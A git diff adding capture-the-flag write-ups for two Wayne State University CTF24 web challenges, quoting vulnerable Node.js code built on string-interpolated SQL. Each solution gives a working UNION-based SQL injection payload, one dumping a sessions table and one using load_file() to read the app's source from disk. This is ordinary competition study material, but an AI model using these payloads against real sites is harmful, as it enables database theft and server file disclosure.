diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/EatMoreCookiespt2.zip b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/EatMoreCookiespt2.zip new file mode 100644 index 0000000..ad84362 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/EatMoreCookiespt2.zip differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/README.md b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/README.md new file mode 100644 index 0000000..5593906 --- /dev/null +++ b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/README.md @@ -0,0 +1,84 @@ +# Eat More Cookies (Part 2) +> `-` + +## About the Challenge +We got a website and also the source code (You can download the source code [here](EatMoreCookiespt2.zip)). Here is the preview of the website + +![preview](images/preview.png) + +If we check the source code, especially this part: + +```js +app.get("/searchcookies", isAuthenticated, async (req, res, next) => { + cookies = req.query.cookies; + + const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`; + + pool.query(query, (err, result) => { + if(err){ + return next(err) + } + + return res.status(200).render("index", {cookies: result || []}) + }); +}) +``` + +The `cookies` parameter is vulnerable to SQL injection, and we can get the flag by accessing `/flag` endpoint + +```js +app.get("/flag", isAdmin, (req, res, next) => { + + return res.json({"flag": "WSUCTF{F4ke_Flag}"}) +}) +``` + +But we need to login as administrator first: + +```js +app.post("/adminLogin", async (req, res, next) => { + const { username, password } = req.body; + const query = 'SELECT * FROM users WHERE username = ? LIMIT 1'; + try { + pool.query(query, [username], async (err, result) => { + + user = result[0]; + + console.log(user); + + if(!user){ + return res.json({message: "User not found. Please try again."}) + } + + let comparePassword = await bcrypt.compare(password, user.password); + + if(username == "Administrator" && comparePassword){ + req.session.username = "Admin"; + req.session.isAdmin = true; + + return res.json({"message": "Successfully logged in as adminstrator."}) + } else if(comparePassword){ + return res.json({"message": "You are logged in, but you aren't administrator. You could've used the regular login instead!"}) + } else { + return res.json({"message": "Invalid username or password. Please try again."}) + } + }) + } catch (err) { + return next(err) + } + +}) +``` + +## How to Solve? +To solve this chall, im using unintended way. Im using `load_file()` MySQL function to read local file and then read `app.js` file + +``` +" union select 1,load_file('/app/src/app.js'),3-- - +``` + +![flag](images/flag.png) + +``` +WSUCTF{Sess1on_IDs_m4ch_more_v4lner9ble_th9n_I_TH0ught} +``` \ No newline at end of file diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/flag.png b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/flag.png new file mode 100644 index 0000000..7d8b944 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/flag.png differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/preview.png b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/preview.png new file mode 100644 index 0000000..acd3ad3 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies (Part 2)/images/preview.png differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/EatMoreCookies.zip b/2024/Wayne State University - CTF24/Eat More Cookies/EatMoreCookies.zip new file mode 100644 index 0000000..dd52503 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies/EatMoreCookies.zip differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/README.md b/2024/Wayne State University - CTF24/Eat More Cookies/README.md new file mode 100644 index 0000000..1fddf77 --- /dev/null +++ b/2024/Wayne State University - CTF24/Eat More Cookies/README.md @@ -0,0 +1,51 @@ +# Eat More Cookies +> `-` + +## About the Challenge +We got a website and also the source code (You can download the source code [here](EatMoreCookies.zip)). Here is the preview of the website + +![preview](images/preview.png) + +If we check the source code, especially this part: + +```js +app.get("/searchcookies", isAuthenticated, async (req, res, next) => { + cookies = req.query.cookies; + + const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`; + + pool.query(query, (err, result) => { + if(err){ + return next(err) + } + + return res.status(200).render("index", {cookies: result || []}) + }); +}) +``` + +The `cookies` paramter is vulnerable to SQL injection, and the flag is inside another table called `sessions` + +```js +try { + const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true}; + const sessionId = 'WSUCTF{F4ke_Flag}'; + const expirationTimestamp = 1712172179; + + const serializedData = JSON.stringify(adminCookieData); + + const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`; +``` + +## How to Solve? +To get every `session_id` inside `sessions` table, im using this payload: + +``` +" union select 1,(select group_concat(session_id) from sessions),3-- - +``` + +![flag](images/flag.png) + +``` +{WSUCTF24:S3arching_Thr0ugh_Very_Expr3ssive_DBz} +``` \ No newline at end of file diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/images/flag.png b/2024/Wayne State University - CTF24/Eat More Cookies/images/flag.png new file mode 100644 index 0000000..24ea088 Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies/images/flag.png differ diff --git a/2024/Wayne State University - CTF24/Eat More Cookies/images/preview.png b/2024/Wayne State University - CTF24/Eat More Cookies/images/preview.png new file mode 100644 index 0000000..0c2c63d Binary files /dev/null and b/2024/Wayne State University - CTF24/Eat More Cookies/images/preview.png differ diff --git a/2024/Wayne State University - CTF24/README.md b/2024/Wayne State University - CTF24/README.md new file mode 100644 index 0000000..78fda08 --- /dev/null +++ b/2024/Wayne State University - CTF24/README.md @@ -0,0 +1,7 @@ +# Wayne State University - CTF24 +CTF writeup for The Wayne State University - CTF24. I took part in this CTF competition with the Heroes Cyber Security team and secured the 1st place out of 75 teams + +| Category | Challenge | +| --- | --- | +| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies/) +| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies%20(Part%202)/) \ No newline at end of file diff --git a/README.md b/README.md index d94888f..ef78db1 100644 --- a/README.md +++ b/README.md @@ -11,6 +11,7 @@ There are __551__ CTF writeups that have been made in this repository | Event Name | Team | Ranking | | ---------- | ---- | ------- | +| Wayne State University - CTF24 | 1 | | KnightCTF 2024 | Heroes Cyber Security | 1 | | DeconstruCT.F 2023 | aseng_fans_club | 1 | | The Odyssey CTF | aseng_fans_club | 1 | @@ -48,6 +49,7 @@ List of CTF events that i have joined before | 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) | | UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/UNbreakable%20International%202024%20-%20Team%20Phase/) | | SwampCTF 2024 | Yes |[Link](/2024/SwampCTF%202024/) | +| Wayne State University - CTF24 | Yes |[Link](/2024/Wayne%20State%20University%20-%20CTF24/) | ### Local Events | Event Name | Writeup Available? | Writeup Link |